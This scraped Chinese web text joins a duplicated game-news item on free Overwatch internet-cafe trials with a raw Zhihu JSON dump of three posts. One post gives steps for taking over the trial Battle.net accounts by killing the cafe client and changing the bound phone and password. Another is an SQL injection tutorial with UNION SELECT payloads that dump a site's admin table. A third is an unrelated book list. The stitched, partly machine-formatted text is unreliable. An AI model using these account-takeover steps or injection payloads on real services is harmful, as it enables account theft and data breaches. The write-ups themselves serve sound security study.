巴士守望先锋
守望先锋网吧免费试玩活动正式开启
来源：官方作者：佚名发布时间： 14:16
　　第10届暴雪嘉年华将于美国加州当地时间日及5日再度降临安纳海姆会议中心。在这里，你可以与开发和美术团队的代表面对面交流，了解《守望先锋》的最新消息，参与缤纷多彩的社区趣味竞赛，赢取奖励丰厚的周边。首届《守望先锋》世界杯总决赛也将在暴雪嘉年华上点燃战火。开启传送面板，准备来一场史诗的冒险吧!
　　如果你无法亲临安纳海姆参与暴雪嘉年华，那么这场网吧免费试玩狂欢可不能再错过了。为了让广大中国玩家都能够尽情体验《守望先锋》的游戏乐趣，我们将与火马电竞、易游、云更新合作，在全国范围内开展《守望先锋》免费试玩活动，席卷全国的网吧免费试玩活动正式开启!
　　即日起，所有玩家均可在官方授权的网吧申请免费试玩2小时《守望先锋》!所有合作网吧均有设置《守望先锋》的申请入口，申请成功之后系统将会自动登录游戏。退出游戏或试玩满2小时就会被系统判定为试玩结束。当然，准备好战斗的你也可以购买《守望先锋》，和22位英雄一起加入到这战火纷飞的未来战场并取得胜利!快拉上你的战友，一同化身为守望先锋吧!
TGBUS Corporation, All Rights Reserved《守望先锋》网吧免费试玩活动正式开启
13:46:34 条 来源：官方 作者：官方 ]
　　第10届暴雪嘉年华将于国加州当地时间日及5日再度降临安纳海姆会议中心。在这里，你可以与开发和美术团队的代表面对面交流，了解《守望先锋》的最新消息，参与缤纷多彩的社区趣味竞赛，赢取奖励丰厚的周边。首届《守望先锋》世界杯总决赛也将在暴雪嘉年华上点燃战火。开启传送面板，准备来一场史诗的冒险吧！
　　如果你无法亲临安纳海姆参与暴雪嘉年华，那么这场网吧免费试玩狂欢可不能再错过了。为了让广大中国玩家都能够尽情体验《守望先锋》的游戏乐趣，我们将与火马电竞、易游、云更新合作，在全国范围内开展《守望先锋》免费试玩活动，席卷全国的网吧免费试玩活动正式开启！
　　即日起，所有玩家均可在官方授权的网吧申请免费试玩2小时《守望先锋》！所有合作网吧均有设置《守望先锋》的申请入口，申请成功之后系统将会自动登录游戏。退出游戏或试玩满2小时就会被系统判定为试玩结束。当然，准备好战斗的你也可以购买《守望先锋》，和22位英雄一起加入到这战火纷飞的未来战场并取得胜利！快拉上你的战友，一同化身为守望先锋吧！
看完本文后有何评价？已有0人评价，点选表情后可看到其他玩家的表态。守望先锋(屁股)之不花钱无限获取账号游玩(可改密) - 知乎专栏
{"debug":false,"apiRoot":"","paySDK":"/api/js","wechatConfigAPI":"/api/wechat/jssdkconfig","name":"production","instance":"column","tokens":{"X-XSRF-TOKEN":null,"X-UDID":null,"Authorization":"oauth c3cef7c66aa9e6a1e3160e20"}}
{"database":{"Post":{"":{"title":"守望先锋(屁股)之不花钱无限获取账号游玩(可改密)","author":"gh0stkey","content":"前言：漏洞已修复首先我们来了解下守望先锋的价格：分别是328元和198元自从菜鸡Az 一直在秀自己的守望屁股之后，我就忍不住想玩啊，但是一个字围绕着自己，穷！那只有靠双手来拼搏了~第二天看到一个朋友说网吧有账号体验的活动，于是就前去网吧看了下~使用火马电竞免费试玩功能登录守望先锋OK：自己随便测试了下发现存在一个大大的逻辑，下面看我步骤吧！！自己随便测试了下发现存在一个大大的逻辑，下面看我步骤吧！！步骤1：等待战网客户端成功启动后通过任务管理器关闭火马电竞客户端 SWBox.exe(为什么关闭？因为他会阻止我们下面的访问页面的操作！)步骤2：从右下角调出战网界面（这里不作图片掩饰）步骤3：logo→点击管理帐号按钮步骤4：浏览器会自动进入战网帐号管理页面，并修改绑定手机，这里需要接一个手机的验证码（这里不作演示）最后效果如下：(因为试玩账号没有绑定的手机号 所以是一个很不安全的账号)经过测试可以直接修改账号密码。经过测试可以直接修改账号密码。有些人可能不理解我的这个步骤逻辑，其实我是先看到的这个管理账号按钮才引发的思考最后才得以挖掘到！漏洞进度：---------文章分隔线----------有些人在说，既然修复了为什么发出来？严格的说，我如果发出来，我就是一个犯罪者。(不懂法律的请自行查)小我的说，我修复后发出来只是分享一个简单的思路。如果你不喜欢我的文章，那么一句话：不喜勿喷---------更新---------网友做了张表情包，我就放上来了，哈哈~网友做了张表情包，我就放上来了，哈哈~纯粹技术分享，请勿用到非法途径，否则跟本人无关！另外有一起撸屁股的吗~嘿嘿","updated":"T15:04:05.000Z","canComment":false,"commentPermission":"anyone","commentCount":96,"collapsedCount":2,"likeCount":474,"state":"published","isLiked":false,"slug":"","lastestTipjarors":[],"isTitleImageFullScreen":false,"rating":"none","titleImage":"/v2-f11d627b320f83beebc18f_r.jpg","links":{"comments":"/api/posts//comments"},"reviewers":[],"topics":[{"url":"/topic/","id":"","name":"守望先锋?"},{"url":"/topic/","id":"","name":"黑客 (Hacker)"},{"url":"/topic/","id":"","name":"漏洞挖掘"}],"adminClosedComment":false,"titleImageSize":{"width":700,"height":394},"href":"/api/posts/","excerptTitle":"","column":{"slug":"hi-ourlife","name":"米斯特安全团队"},"tipjarState":"activated","tipjarTagLine":"真诚赞赏，手留余香","sourceUrl":"","pageCommentsCount":96,"tipjarorCount":0,"annotationAction":[],"hasPublishingDraft":false,"snapshotUrl":"","publishedTime":"T23:04:05+08:00","url":"/p/","lastestLikers":[{"bio":null,"isFollowing":false,"hash":"6c855a763bc904c47b9b6","uid":948000,"isOrg":false,"slug":"yigechengzi8","isFollowed":false,"description":"","name":"一个橙子","profileUrl":"/people/yigechengzi8","avatar":{"id":"v2-783d5cf47dd0e632f0cd37a0efa8ad59","template":"/{id}_{size}.jpg"},"isOrgWhiteList":false},{"bio":null,"isFollowing":false,"hash":"5c94c755014cacb01db61","uid":68,"isOrg":false,"slug":"gao-qian-53-2","isFollowed":false,"description":"","name":"口水水","profileUrl":"/people/gao-qian-53-2","avatar":{"id":"v2-8ef69bc626f023fa120b","template":"/{id}_{size}.jpg"},"isOrgWhiteList":false},{"bio":"数通底层员工","isFollowing":false,"hash":"e927b7ee0b","uid":838500,"isOrg":false,"slug":"cszcsz104401","isFollowed":false,"description":"","name":"cszcsz104401","profileUrl":"/people/cszcsz104401","avatar":{"id":"aef750ed9a1a1da8838e","template":"/{id}_{size}.jpg"},"isOrgWhiteList":false},{"bio":"学生","isFollowing":false,"hash":"36deb6c16dc48dedd47d004ca47665e8","uid":062200,"isOrg":false,"slug":"Leepy233","isFollowed":false,"description":"","name":"Leepy","profileUrl":"/people/Leepy233","avatar":{"id":"4c63ad1eb8dad3fb5aeb92ff81d0eec4","template":"/{id}_{size}.jpg"},"isOrgWhiteList":false},{"bio":null,"isFollowing":false,"hash":"1e52bfa8da99bec59ef1ad","uid":08,"isOrg":false,"slug":"jian-dan-53-85","isFollowed":false,"description":"你所浪费的今天，是昨天死去的人奢望的明天。你所厌恶的现在，是未来的你回不去的曾经。时间残忍,珍惜眼前人","name":"蓝海","profileUrl":"/people/jian-dan-53-85","avatar":{"id":"01a5bc48dd08b996ae69e","template":"/{id}_{size}.jpg"},"isOrgWhiteList":false}],"summary":"前言：漏洞已修复 首先我们来了解下守望先锋的价格：分别是328元和198元 自从菜鸡Az 一直在秀自己的守望屁股之后，我就忍不住想玩啊，但是一个字围绕着自己，穷！ 那只有靠双手来拼搏了~第二天看到一个朋友说网吧有账号体验的活动，于是就前去网吧看了…","reviewingCommentsCount":0,"meta":{"previous":{"isTitleImageFullScreen":false,"rating":"none","titleImage":"/v2-c17d5c8328594dce492c527b669f8042_r.jpg","links":{"comments":"/api/posts//comments"},"topics":[{"url":"/topic/","id":"","name":"信息安全"},{"url":"/topic/","id":"","name":"自学编程"},{"url":"/topic/","id":"","name":"网络通讯"}],"adminClosedComment":false,"href":"/api/posts/","excerptTitle":"","author":{"bio":"公司CEO/安全团队负责人/创业狗/想要减肥的胖子","isFollowing":false,"hash":"bcb661e8a0308dbff8aef30","uid":198400,"isOrg":false,"slug":"lin-chen-95-41","isFollowed":false,"description":"信安问题我会邀请同事回答，想转文学类话题，毕竟我想当一个通读古史，能写诗的理科生\n\n比我牛逼的人，没时间也懒得理我。有空骂我的人，比我垃圾还比我闲。\n\n\n“苏州司业诗名老,乐府皆言妙入神.\n看似寻常最奇崛,成如容易却艰辛.”\n\n\n深圳鼎安天下信息科技有限公司CEO...\n国内首个CTF工具框架(CTFCrackTools)开发者...\n米斯特安全团队创始人...\n\n\nQQ/微信:（添加注明来意）","name":"林晨","profileUrl":"/people/lin-chen-95-41","avatar":{"id":"v2-5a8cd113a11b9ae2eb7c25","template":"/{id}_{size}.jpg"},"isOrgWhiteList":false},"column":{"slug":"hi-ourlife","name":"米斯特安全团队"},"content":"新年到了，作为新年礼物。我想推荐一张书单给你。2017年，相信有很多朋友都有新年的计划，想要在今年更进一层楼。题图是航海的图片，想送给打算更上一层楼的朋友一句大家非常熟悉的古诗：长风破浪会有时，直挂云帆济沧海在这里，我准备了一份不错的礼物送给各位（文末附彩蛋），当然我们的礼物包括但不限于此。我们在即将新年的时候爬了京东某些书籍的评论量（我们只选取了京东自营的书籍，这极大避免了出现刷单这种情况的发生。）用评论数来作为书籍的销售饼图（销售量不可计算，用评论数来做占比）（PS:由于京东不提供具体评论数，我们只能用评论数的1-100之间的浮动取0来计算）并且统计了该类书籍的好评排名。 爬虫的作者爬虫的Github地址：很多粉丝都是信安方面的我们先来看看信安方面的书籍有哪些。信安方面销售量占多位数的应该是：《华为ICT认证系列丛书：华为防火墙技术漫谈》其对应的评论数在之间好评率为97% 该书出版时间为2015年5月好评数占高位的是：《网络安全监控实战：深入理解事件检测与响应》其对应的评论数在100-109之间。好评率为：99%该书出版时间为：2015年4月可能该书的原版是英文，国人对该书不大习惯。故此销售量偏冷。在销售量前六名的书籍中，没有一本是2016年出版的。故此推荐《华为ICT认证系列丛书：华为防火墙技术漫谈》接下来这个是网络通讯方面网络通讯方面的书非常多。但是就销售量的饼图来看：《TCP/IP详解卷1》《TCP/IP详解卷2》《TCP/IP详解卷3》占所有评论数的26.5%可见就网络通讯方面而言，《TCP/IP详解卷》是一部经典佳作以上该系列书籍的评论数皆在之间抛开这部作品销售占比并列第二名的是：《图解HTTP+图解TCP/IP+图解网络硬件（套装共3册）》《图解TCP/IP 第5版》《图解网络硬件》《图灵程序设计丛书：图解服务器端网络架构》《图解HTTP》《图解基础设施设计模式》《图解OpenFlow》评论数都在之间第一名的书籍和第二名的书籍讲：第一名的书籍好评率皆在97%，而第二名的书籍好评率皆在96%好评率为100%的书籍为《计算机网络技术与应用：精选范例解析与习题》但它的评论数仅在100-109之间并且该书的出版时间在2010年9月份。时间这么长了。这个销售量不忍直视。可忽略该书接着是近几年被不停谈到的人工智能排名第一名的书籍有《Python机器学习及实践：从零开始通往Kaggle竞赛之路》出版时间：2016年10月《世界著名计算机教材精选·人工智能：一种现代的方法（第3版）》出版时间：2013年11月《机器学习》出版时间2016年1月《人工智能：一种现代的方法（第3版 影印版）》出版时间2011年7月以上书籍评论数皆在之间《Python机器学习及实践：从零开始通往Kaggle竞赛之路》此书在出版离今天不到4个月的时间里取得2.1W+评论数，内容与质量都堪称极品。推荐！好评率最高的书籍是：《乐高机器人EV3创意实验室》好评率为100%，评论数在100-109之间，出版时间为2016年5月。销售量也是比较冷的如果感觉已经在编程路上摸出一块好办法的朋友可以直接跳到文末了。现在开始讲编程语言书籍。Android编程书籍安卓编程的书籍已经被《Android编程权威指南 第2版》以及《第一行代码 Android 第2版》占据了并且俩书的好评率都在97%，且评论数都在之间。笔者看过以上俩本书籍中的一本（避免说偏爱嫌疑，不说书名），内容是非常不错。《Android编程权威指南 第2版》出版时间为2016年5月《第一行代码 Android 第2版》出版时间为2016年12月就时间与销售量的关系讲，我感觉《第一行代码 Android 第2版》的质量会更好。毕竟目前发布还未满2个月，就堪比早7个月前发布的书籍《Android编程权威指南 第2版》侧重推荐《第一行代码 Android 第2版》ASPX类书籍ASPX销量最高的书籍为：《 MVC 5高级编程(第5版)（.NET开发经典名著）》出版时间为2015年1月而评论数在之间倘若为1300，则与1299相差1这就引出接下来的这个书籍《软件开发视频大讲堂：从入门到精通（第3版 附光盘）》出版时间为2013年9月就评论数与出版时间关系来看：《 MVC 5高级编程(第5版)（.NET开发经典名著）》才是在ASPX领域中不错的书籍，该书的好评率为96%而作为老前辈的《软件开发视频大讲堂：从入门到精通（第3版 附光盘）》，好评率仅在94%ASPX中好评率最高的书籍为：《庖丁解牛：纵向切入 3.5控件和组件开发技术（第2版）（附CD光盘1张）》以及《代码重构（C# & 版）》俩书的好评率皆为98%，评论数都在100-109之间。接着是C#类书籍C#类书籍中 销量最高的是：《C#入门经典（第6版）》评论数在之间，好评率为96%出版时间：2014年1月而该书的新版《C#入门经典（第7版）》以及前一版《C#入门经典（第5版）》评论数都在，好评率皆为94%C#类书籍的好评率最高的是：《CLR via C#（第3版）》好评率为98%，评论数在之间 出版时间：2010年9月《C#与.NET 4高级程序设计（第5版）》好评率为98%，评论数在500-599之间 出版时间：2015年1月《代码重构（C# & 版）》好评率为98%，评论数在100-109之间 出版时间：2011年6月就评论数与出版时间看《C#入门经典》系列书籍为C#领域中的经典推荐《C#入门经典》系列新书：《C#入门经典（第7版）》出版时间为2016年8月C++类型可以直观看出 C++领域中销售量最高的书籍是：《C和C++经典著作：C陷阱与缺陷》此时评论数在之间好评率为96% 出版时间：2008年2月由于是老书，故此不推荐购买。接着看销售的第二、三、四名。《C++ Primer（中文版 第5版）》好评率为97%《C++ Primer中文版 第4版》好评率为96% 《C++ Primer Plus（第6版 中文版）》好评率为95% 由楼下评论区一位老哥 的提醒，特意看了网络上对C++ Primer与C++ Primer Plus的评论，推荐《C++ Primer（中文版 第5版）》对编辑的时候的疏忽表示抱歉，过年事情太多，见谅！有错误的地方麻烦指出，谢谢。由于近期的微信小程序热潮，不少公司都成立了微信小程序的开发部门，所以接下来介绍HTML5的书籍可以看到销售量最高的书籍是：《HTML5与CSS3基础教程（第8版）》好评率是95%，评论数在之间。该书出版时间在：2014年5月份。好评率最高的书籍是：《HTML5 Canvas核心技术：图形、动画与游戏开发》出版时间：2013年5月 评论数在600-699之间《HTML5秘籍》出版时间：2015年3月 评论数在100-109之间《HTML5与CSS3基础教程（第7版）》出版时间为：2013年1月 评论数在100-109之间好评率都为98%仅推荐《HTML5与CSS3基础教程（第8版）》，如果有朋友在HTML5方面有好书推荐的，可以在下方评论给出你认为在该领域中优秀的书籍书名。谢谢哦！接下来的这个书籍是我统计到目前为止。最冷门的。IOS类。场面陷入一度尴尬。俩书的评论数均为：100-109之间好评率最高的97%的是：《图灵程序设计丛书·网络安全系列：黑客攻防技术宝典·iOS实战篇》恕我为难。实在推荐不了......没有涉及到IOS应用的编写编写IOS应用程序可以接着往下看：有Swift语言的书籍推荐！接下来是JavaScript方面该领域中有《JavaScript DOM编程艺术（第2版）》《JavaScript高级程序设计（第3版）》占据了61.6%俩书的评论数在之间，好评率都为97%《JavaScript DOM编程艺术（第2版）》出版时间：2011年4月《JavaScript高级程序设计（第3版）》出版时间：2012年3月应该不用看好评数最高了..这俩本书已经被占了大半壁江山了。就出版时间的近讲：推荐《JavaScript高级程序设计（第3版）》接下来是笔者目前在学习的语言-Java销售量排名第一的是《Java编程思想（第4版）》与《深入理解Java虚拟机：JVM高级特性与最佳实践（第2版）》、《自己动手写Java虚拟机》评论数在之间以上书籍的出版时间分别为：2007年6月，2013年5月，2016年6月排名第二的是《Java从入门到精通（第4版 附光盘）》《软件开发视频大讲堂：Java从入门到精通（第3版 附光盘）》评论数在之间以上书籍好评率皆为97%好巧！推荐《自己动手写Java虚拟机》在JavaWeb方面也有一些不错的书籍：其中占半壁江山的书籍为《Java Web整合开发王者归来（JSP+Servlet+Struts+Hibernate+Spring）（附光盘）》评论数在之间好评率为95%。此书出版时间为：2010年1月接下来是Perl语言：Perl语言的书籍实在没有多少可以介绍的。《O'Reilly：Perl语言入门（第6版）（中文版）》评论量在之间，好评率为96%出版时间再2012年3月。有意向入手Perl语言的朋友可以自行斟酌。接下来的这个语言，是“最好的编程语言”没错，PHP！此技能学好即可“文能写代码，武能拍黄片” 介绍下并列排名第一的书籍：《软件开发视频大讲堂：PHP从入门到精通（第3版 附光盘）》《PHP开发实例大全（基础卷 附光盘）》《PHP开发实例大全 提高卷/软件工程师开发大系（附光盘）》评论数在之间，好评率都较低。为95%从以上三本书籍可看到：《PHP开发实例大全》系列书籍占三分之二，且《软件开发视频大讲堂：PHP从入门到精通（第3版 附光盘）》的出版时间是在2012年7月。而《PHP开发实例大全（基础卷 附光盘）》《PHP开发实例大全 提高卷/软件工程师开发大系（附光盘）》的出版时间都在2016年1月很多朋友提到的《细说PHP（第2版）（含DVD光盘1张）》评论数在之间。好评率在95%，出版时间为2012年11月推荐《PHP开发实例大全》基础提高双卷书籍。相信大家都知道这些数据爬取所用的脚本时哪个语言编写的。没错，就是——Python！Python也是一门非常火热的语言。我们接下来看看Python书籍在京东自营店的销售数据吧。
五本并列第一名的书籍着实让我吓一跳。总占71.5%评论数都在之间，好评率皆为96%逐个介绍：《Python基础教程（第2版 修订版）》出版时间2014年6月《Python核心编程（第3版）》出版时间2016年5月《Python核心编程（第2版）》出版时间2008年7月《用Python写网络爬虫》出版时间2016年8月《Python网络数据采集》出版时间2016年3月可以看到，近年关于Python的书籍的出品速度越来越快，Python估计也会是往后几年的关注焦点。如果想从基础开始学习Python的，我推荐《Python核心编程（第3版）》侧重网络爬虫的可看《用Python写网络爬虫》《Python网络数据采集》任选在做网络安全中，有一款非常知名的安全漏洞检测框架。它的名字就叫做：Metasploit Framework（MSF）该框架的编写在2007年的时候就换成了以下这个语言：Ruby所以现在来推荐下学习Ruby的相关书籍： Ruby相关的书籍寥寥无几。而有这些书籍并列第一，他们的评论数都在之间，好评率都在97%，分别是以下书籍：《Ruby基础教程第4版》出版时间2014年9月《Ruby原理剖析》出版时间2016年12月《笨办法 学Ruby 第3版》出版时间2015年12月《Ruby元编程（第2版）》出版时间2015年7月《Effective Ruby：改善Ruby程序的48条建议》出版时间2016年1月强烈推荐《Ruby原理剖析》在上文中提到Swift语言。现在来看看Swifit的销售数据吧。 值得点出来的书籍有销售第一名的《疯狂Swift讲义（第2版）》，以及第二名的《Swift基础教程》以下是这些书籍的详情《疯狂Swift讲义（第2版）》评论数在1之间，好评率为97%，出版时间为2016年3月《Swift基础教程》评论数在之间，好评率为95%，出版时间为2016年6月。我更喜欢口碑好的作品，所以就Swift讲，我推荐《疯狂Swift讲义（第2版）》 毕竟97%与95%差的不是一星半点。最后的书籍，就来讲讲关于前端的。关于前端书籍的销售量：占47.4%之多的书籍是：《架构即未来：现代企业可扩展的Web架构、流程和组织（原书第2版）》评论数在之间，好评率为97%出版时间为：2016年4月。书名听起来就很高大上。行了，太困了，我去睡觉了。欢迎网友们进行二次分析。数据会在明天共享给大家，有兴趣的朋友也可以自己爬。彩蛋很多人也许看过我们米斯特第一期培训的教程，应该是我们在2016年一份口碑不错的教程，得到过许多的赞扬。没错，2017年的新年礼物，我希望是：米斯特第二期培训的教程的免费公布。Gh0sykey会在几天之后公布我们第二期培训的教程，届时欢迎各位的指点。还有就是接着会由该爬虫作者的文章，讲述爬虫的实现。还有一篇涉及政府官员的文章，可能会被知乎官方屏蔽。请关注我们的微信公众号：hi-ourlife了解更多详情。","state":"published","sourceUrl":"","pageCommentsCount":0,"canComment":false,"snapshotUrl":"","slug":,"publishedTime":"T15:12:10+08:00","url":"/p/","title":"新年好，这是一份不能及时在新年寄过来的书单。","summary":"新年到了，作为新年礼物。我想推荐一张书单给你。2017年，相信有很多朋友都有新年的计划，想要在今年更进一层楼。题图是航海的图片，想送给打算更上一层楼的朋友一句大家非常熟悉的古诗：长风破浪会有时，直挂云帆济沧海 在这里，我准备了一份不错的礼物送…","reviewingCommentsCount":0,"meta":{"previous":null,"next":null},"commentPermission":"anyone","commentsCount":15,"likesCount":47},"next":{"isTitleImageFullScreen":false,"rating":"none","titleImage":"/v2-b65cd5d437d1e85704b70bcf_r.jpg","links":{"comments":"/api/posts//comments"},"topics":[{"url":"/topic/","id":"","name":"信息安全"},{"url":"/topic/","id":"","name":"网络安全"},{"url":"/topic/","id":"","name":"黑客 (Hacker)"}],"adminClosedComment":false,"href":"/api/posts/","excerptTitle":"","author":{"bio":"多思则明，多学则精，多问则博。","isFollowing":false,"hash":"e46c45ebfaba974a9e5ecd7","uid":331300,"isOrg":false,"slug":"gh0stkey","isFollowed":false,"description":"我已委托“维权骑士”（）为我的文章进行维权行动","name":"Peter Winter","profileUrl":"/people/gh0stkey","avatar":{"id":"v2-3ca0b42e5bd956acdca40583","template":"/{id}_{size}.jpg"},"isOrgWhiteList":false},"column":{"slug":"hi-ourlife","name":"米斯特安全团队"},"content":"介绍：在Access数据库类型注入的时候，我们获取不到列名(前提是有表名)，一般会选择使用偏移注入，但是这种注入方式往往借助的是个人的人品，且步骤繁琐。本文中我们研究了一种新的注入技术让“偏移注入不在需要人品”。在这里定义这种注入技术为：“移位溢注技术”。它适用于ACCESS和MYSQL（任何版本）正文：我们先来看看普通的偏移注入步骤：1.判断注入点2.order by 判断长度3.判断表名4.联合查询5.获取表中列数：union select 1,2,3,4,..,* from TABLE6.开始偏移注入：TABLE as a inner join TABLE as b on\na.id=b.id由于步骤6的方法过于需要人品值，且语句繁琐，因此在这里，我们研究新的注入技术：首先来看看步骤6语句的整体意思：步骤6的语句，表示给TALBE取2个别名，然后分别用别名取查询TALBE的内容（表a和表b）；而on a.id = b.id 这样的条件是为了满足语法需求，实际并没有作用，因为相同内容的表，相同字段内容一定相同。这时，我们再回过头来看步骤5：由于联合查询中select后面添加数字的目的是为了让联合查询返回接结果和网站正常查询返回的结果的列数一致（不一致数据库会报错，页面无法显示），且*表示通配符，可以表示整个表格所有列；因此这里通过数字来占位，并使用*来替代TABLE中的所有列，使得联合查询可以完成，并推算出*的值。这时候我们继续研究偏移注入的整体公式方法，发现即使使用多级偏移注入也需要一定的概率(人品值)才可以得到想要的结果，所以我们就尝试研究新的方法能不能替换这种不固定概率的方法。现在我们重新整理一下SQL语句，从联合查询开始：1.原union语句：union select 1,2,3,..,p..,n from TABLE（p=页面爆出的数字，可能有多个p1,p2..；n=原网站查询的总列数；TALBE=我们获得的表名；下面开始就使用上述字母的定义）2.新语句：union select 1,2,3,..,p-1,TABLE.*,p+k,..,n\nfrom TABLE where 字段名 = 字段内容--在p的位置爆出TALBE表中第一个字段的内容（其他位置还可能爆出更多内容）（这里如果存在已知字段名可以使用，没有就不用，一般id这个字段时存在的，可以使用id = 1来显示第一行）union select\n1,2,3,..,p-2,TABLE.*,p+k-1,..,n from TABLE where 字段名 = 字段内容--在p的位置爆出TALBE表中第二个字段的内容（其他位置还可能爆出更多内容）union select 1,2,3,..,p-3,TABLE.*,p+k-2,..,n\nfrom TABLE where 字段名 = 字段内容--在p的位置爆出TALBE表中第三个字段的内容（其他位置还可能爆出更多内容）注：这里一定是TALBE.*而不是*3.1 以此类推可以爆出TALBE的每一列内容。3.2 如果p&k则没法爆出p+1列至k列的内容，如果n-p&k则无法爆出第1列至k-(n-p)列。原理：1.由原语句：union select 1,2,3,..,p..,n-k,* from TABLE 可以得出该联合查询的目的是构造和原网站相同列数的查询结构，使得页面上可以显示对应的数字；这条语句相当于是做了两次查询并将它们的结果合并，第一次做了select 1,2,3,..,n-k from TALBE ，第二次做了select * from TALBE ，然后将它们的结果合并。这可以参考mysql的语句：select 1,2,3,4,5,admin.*2.只要满足原理1的要求，保障联合查询的结果和原网站查询的结果列数一致即可；因此可以将TALBE.*向前移动至页面显示的数字处来爆出TALBE列中的内容。这可以参考mysql的语句：select 1,2,3,4,5,6,7,8,9,10 from news\nwhere id =1 union select 1,2,3,4,5,6,7,admin.*select 1,2,3,4,5,6,7,8,9,10 from news\nwhere id =1 union select 1,2,3,admin.*,7,8,9,10注：假设数字4、5在页面显示。由下图可知，其实数据已近查询出来，但是页面没有显示，这个是通过平移查询结果到页面显示的数字上去，即可爆出敏感字段。例子：步骤1：判断注入点是否存在步骤2：判断字段长度：order by 35步骤3：获得表名(必备条件)
and exists(select * from admin)步骤4：获取不了列名（当尝试多个常用字段名以后，最终还是发现无法获得字段名）步骤5：使用联合查询(union select)步骤6：使用新注入技术方法（1）获取admin表的列数：UNION SELECT\n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,*\nfrom admin
--返回错误页面UNION SELECT\n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,*\nfrom admin
--返回错误页面UNION SELECT\n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,*\nfrom admin
--返回错误页面UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,*\nfrom admin
--返回错误页面。。。UNION SELECT\n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,*\nfrom admin
--返回步骤5页面，因此admin表的列数为6（2）由于网页中包含连续数字，表示可以显示连续的查询结果，构造SQL语句查询前四列第一行。UNION SELECT\n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,admin.*,34,35\nfrom admin（3）由第一行第一列内容为1，可以猜测该表有id字段，因此修改语句获取其他行。UNION SELECT\n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,admin.*,34,35\nfrom admin where id = 3总结在这里我们命名这种新注入技术为\"移位溢注\"。由此如果MYSQL小于5.0的情况下所具备的条件和ACCESS一样，也可以使用此方法注入，如果是MYSQL大于5.0的版本，使用此方法可以省去获得列名的步骤。文章研究：米斯特安全攻防实验室 MST.Lab
@","state":"published","sourceUrl":"","pageCommentsCount":0,"canComment":false,"snapshotUrl":"","slug":,"publishedTime":"T22:21:09+08:00","url":"/p/","title":"移位溢注：告别依靠人品的偏移注入","summary":"介绍： 在Access数据库类型注入的时候，我们获取不到列名(前提是有表名)，一般会选择使用偏移注入，但是这种注入方式往往借助的是个人的人品，且步骤繁琐。本文中我们研究了一种新的注入技术让“偏移注入不在需要人品”。在这里定义这种注入技术为：“移位…","reviewingCommentsCount":0,"meta":{"previous":null,"next":null},"commentPermission":"anyone","commentsCount":5,"likesCount":21}},"annotationDetail":null,"commentsCount":96,"likesCount":474,"FULLINFO":true}},"User":{"gh0stkey":{"isFollowed":false,"name":"Peter Winter","headline":"我已委托“维权骑士”（）为我的文章进行维权行动","avatarUrl":"/v2-3ca0b42e5bd956acdca40583_s.jpg","isFollowing":false,"type":"people","slug":"gh0stkey","bio":"多思则明，多学则精，多问则博。","hash":"e46c45ebfaba974a9e5ecd7","uid":331300,"isOrg":false,"description":"我已委托“维权骑士”（）为我的文章进行维权行动","profileUrl":"/people/gh0stkey","avatar":{"id":"v2-3ca0b42e5bd956acdca40583","template":"/{id}_{size}.jpg"},"isOrgWhiteList":false,"badge":{"identity":null,"bestAnswerer":null}}},"Comment":{},"favlists":{}},"me":{},"global":{},"columns":{"hi-ourlife":{"following":false,"canManage":false,"href":"/api/columns/hi-ourlife","name":"米斯特安全团队","creator":{"slug":"lin-chen-95-41"},"url":"/hi-ourlife","slug":"hi-ourlife","avatar":{"id":"fa6bac01fd7122","template":"/{id}_{size}.jpeg"}}},"columnPosts":{},"columnSettings":{"colomnAuthor":[],"uploadAvatarDetails":"","contributeRequests":[],"contributeRequestsTotalCount":0,"inviteAuthor":""},"postComments":{},"postReviewComments":{"comments":[],"newComments":[],"hasMore":true},"favlistsByUser":{},"favlistRelations":{},"promotions":{},"switches":{"couldAddVideo":false},"draft":{"titleImage":"","titleImageSize":{},"isTitleImageFullScreen":false,"canTitleImageFullScreen":false,"title":"","titleImageUploading":false,"error":"","content":"","draftLoading":false,"globalLoading":false,"pendingVideo":{"resource":null,"error":null}},"drafts":{"draftsList":[],"next":{}},"config":{"userNotBindPhoneTipString":{}},"recommendPosts":{"articleRecommendations":[],"columnRecommendations":[]},"env":{"isAppView":false,"appViewConfig":{"content_padding_top":128,"content_padding_bottom":56,"content_padding_left":16,"content_padding_right":16,"title_font_size":22,"body_font_size":16,"is_dark_theme":false,"can_auto_load_image":true,"app_info":"OS=iOS"},"isApp":false},"sys":{}}